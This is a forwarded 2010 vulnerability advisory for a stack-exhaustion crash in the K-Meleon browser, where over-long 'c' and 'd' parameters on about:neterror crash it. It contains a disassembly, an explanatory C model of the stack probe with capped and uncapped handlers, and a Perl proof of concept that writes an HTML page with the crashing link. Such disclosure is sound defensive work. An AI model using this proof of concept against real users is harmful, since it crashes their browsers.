
K-Meleon for windows Stack Overflow DoS



Fwd: {Lostmon's Group} K-Meleon for windows about:neterror Stack Overflow DoS



############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL: http://kmeleon.sourceforge.net/
Advisory: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified: Yes    Exploit available: Yes
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.

K-Meleon can be crashed with a very long URL. The internal page
about:neterror does not limit the number of characters accepted in its
'c' and 'd' parameters, so a URL composed with oversized values for
those parameters crashes the browser. The issue can be triggered through
an ordinary web link (an HTML anchor whose href is the malformed URL),
through window.location.replace('very long url'), or similar navigation
vectors.

#################
Versions Tested
#################

I have tested this issue on Windows XP SP3 and on a fully patched Windows 7.

Win XP SP3:
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)
K-Meleon 1.6.0a4: vulnerable (crashes)

Windows 7 Ultimate:
K-Meleon 1.5.3 & 1.5.4: vulnerable (crashes)
K-Meleon 1.6.0a4: vulnerable (crashes)

############
References
############

Discovered: 29-07-2010
Vendor notified: 31-07-2010
Vendor response:
Vendor patch:

########################
ASM code stack overflow
########################

ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png 

CPU Disasm
Address   Hex dump           Command
0043CB3F      CC             INT3
0043CB40  /$  3D 00100000    CMP EAX,1000
0043CB45  |.  73 0E          JNB SHORT 0043CB55
0043CB47  |.  F7D8           NEG EAX
0043CB49  |.  03C4           ADD EAX,ESP
0043CB4B  |.  83C0 04        ADD EAX,4
0043CB4E  |.  8500           TEST DWORD PTR DS:[EAX],EAX
0043CB50  |.  94             XCHG EAX,ESP
0043CB51  |.  8B00           MOV EAX,DWORD PTR DS:[EAX]
0043CB53  |.  50             PUSH EAX
0043CB54  |.  C3             RETN
0043CB55  |>  51             PUSH ECX
0043CB56  |.  8D4C24 08      LEA ECX,[ARG.1]
0043CB5A  |>  81E9 00100000  /SUB ECX,1000
0043CB60  |.  2D 00100000    |SUB EAX,1000
0043CB65  |.  8501           |TEST DWORD PTR DS:[ECX],EAX   <== Stack overflow
0043CB67  |.  3D 00100000    |CMP EAX,1000
0043CB6C  |.^ 73 EC          \JNB SHORT 0043CB5A
0043CB6E  |.  2BC8           SUB ECX,EAX
0043CB70  |.  8BC4           MOV EAX,ESP
0043CB72  |.  8501           TEST DWORD PTR DS:[ECX],EAX
0043CB74  |.  8BE1           MOV ESP,ECX
0043CB76  |.  8B08           MOV ECX,DWORD PTR DS:[EAX]
0043CB78  |.  8B40 04        MOV EAX,DWORD PTR DS:[EAX+4]
0043CB7B  |.  50             PUSH EAX
0043CB7C  \.  C3             RETN
0043CB7D      CC             INT3
0043CB7E      CC             INT3

The routine above is the MSVC compiler's stack-probe helper (_chkstk): EAX
holds the size of the stack frame about to be allocated, and for frames of
0x1000 bytes or more the loop at 0043CB5A moves down one page at a time and
touches each page with TEST DWORD PTR [ECX],EAX so that the guard page is
hit in order. The faulting TEST is therefore the probe walking off the end
of the reserved stack: the frame requested on behalf of the over-long
parameters is larger than the stack itself. That is stack exhaustion, a
crash-only condition, which is consistent with the DoS impact claimed here.
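The description earlier says the 'c' and 'd' parameters are accepted without a length limit, and the listing above shows the probe that fails when the resulting frame is too large. The C below is an added example, not code from this advisory, from K-Meleon or from Gecko: it models the probe loop in portable C so you can see how many pages a given frame touches before the fault and where that fault lands, and puts a hypothetical parameter handler in its unbounded (VLA) and capped forms side by side so the two can be compared. The 1 MB stack, the addresses, MAX_PARAM_LEN and every function name are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAGE_SIZE      0x1000u
#define STACK_BYTES    (1024u * 1024u)   /* assumed 1 MB stack reservation */
#define MAX_PARAM_LEN  4096u             /* cap assumed for the hardened handler */

/* Portable model of the probe loop in the listing (MSVC _chkstk).
 * `frame` plays the role of EAX, `sp` the starting ECX, and the reserved
 * stack is the range [stack_low, sp). A probe below stack_low is the
 * access that raises the stack-overflow exception. Returns the number of
 * probes that succeed; *fault_addr receives the faulting address, or 0 if
 * every probe stayed inside the reservation. */
size_t chkstk_probe(uintptr_t sp, size_t frame, uintptr_t stack_low,
                    uintptr_t *fault_addr)
{
    uintptr_t ecx = sp;
    size_t eax = frame;
    size_t ok = 0;
    *fault_addr = 0;

    if (eax < PAGE_SIZE) {              /* CMP EAX,1000 / JNB: small frame, one touch */
        ecx -= eax;
        if (ecx < stack_low) { *fault_addr = ecx; return ok; }
        return 1;
    }
    while (eax >= PAGE_SIZE) {          /* SUB ECX,1000 / SUB EAX,1000 / TEST [ECX] */
        ecx -= PAGE_SIZE;
        eax -= PAGE_SIZE;
        if (ecx < stack_low) { *fault_addr = ecx; return ok; }
        ok++;
    }
    ecx -= eax;                         /* SUB ECX,EAX: final partial page */
    if (ecx < stack_low) { *fault_addr = ecx; return ok; }
    return ok + 1;
}

/* Would a frame sized by a parameter of `len` bytes exhaust the modelled
 * stack? Ties the handler below to the probe: frame == len + 1. */
int param_exhausts_stack(size_t len)
{
    uintptr_t sp = 0x0019F000u;         /* assumed starting ESP */
    uintptr_t fault;
    chkstk_probe(sp, len + 1, sp - STACK_BYTES, &fault);
    return fault != 0;
}

/* Hypothetical handler for a query parameter such as 'c' or 'd'.
 * Unbounded form: the stack frame is sized by the attacker's input, so the
 * probe above runs as far as the parameter is long. Safe only for short
 * input; a multi-megabyte parameter crashes the process. */
size_t count_bytes_unbounded(const char *param)
{
    char buf[strlen(param) + 1];        /* VLA: stack usage follows the input */
    strcpy(buf, param);
    return strlen(buf);
}

/* Hardened form: the length is checked before any stack is committed and
 * the frame is fixed, so the probe walks the same pages on every call.
 * Returns -1 for an over-long parameter, otherwise its length. */
long count_bytes_bounded(const char *param)
{
    size_t len = 0;
    while (len <= MAX_PARAM_LEN && param[len] != '\0')
        len++;
    if (len > MAX_PARAM_LEN)
        return -1;
    char buf[MAX_PARAM_LEN + 1];
    memcpy(buf, param, len + 1);
    return (long)len;
}

/* Builds an n-byte parameter of 'A's (constructed input) and reports
 * whether the bounded handler rejects it. */
int over_long_rejected(size_t n)
{
    char *p = malloc(n + 1);
    if (p == NULL) return -1;
    memset(p, 'A', n);
    p[n] = '\0';
    long r = count_bytes_bounded(p);
    free(p);
    return r == -1;
}

int main(void)
{
    uintptr_t fault;
    size_t n = chkstk_probe(0x0019F000u, 2u * 1024 * 1024, 0x0009F000u, &fault);
    printf("probes before fault: %zu, faulting address: %#lx\n",
           n, (unsigned long)fault);
    printf("2 MB parameter exhausts stack: %d\n",
           param_exhausts_stack(2u * 1024 * 1024));
    printf("over-long parameter rejected by bounded handler: %d\n",
           over_long_rejected(5000));
    return 0;
}
```

With the 1 MB reservation the 2 MB frame passes 256 probes and faults on the 257th, one page below the reservation; the same parameter fed to the unbounded handler is exactly the case the listing shows, while the bounded handler refuses it before any frame is built.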




################
Proof Of Concept
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# Generate the file, open it with K-Meleon, click the link and wait a few seconds.
######################################################################

use strict;
use warnings;

my $archivo = $ARGV[0];
if (!defined($archivo)) {
    print "Usage: $0 <output.html>\n";
    exit 1;
}

# Length of the 'c' and 'd' parameter values. The archived copy of the
# advisory does not preserve the figure the author used; this value is an
# assumption.
my $longitud = 100000;
my $relleno  = 'A' x $longitud;

# The HTML markup was stripped from the archived copy. The link is
# reconstructed from the advisory text: an anchor whose href is
# about:neterror with over-long 'c' and 'd' parameters.
my $cabecera = "<html><body>\n";
my $payload  = "<a href=\"about:neterror?c=$relleno&d=$relleno\">click here if you can :)</a>\n";
my $fin      = "</body></html>\n";

my $datos = $cabecera . $payload . $fin;

# Open for writing ('>'); the archived copy used '<', which only reads the file.
open(my $fh, '>', $archivo) or die "Cannot open $archivo: $!";
print $fh $datos;
close($fh);

exit;

################## EOF ######################

##############
Related Links
##############

Vendor bug tracker: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Possibly related vulnerability: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test case: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### End #############################

Thanks to Phreak for support and for helping me understand the nature of this bug.
Thanks to jajoni for testing it on the 64-bit version of Windows 7.

Regards:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind...
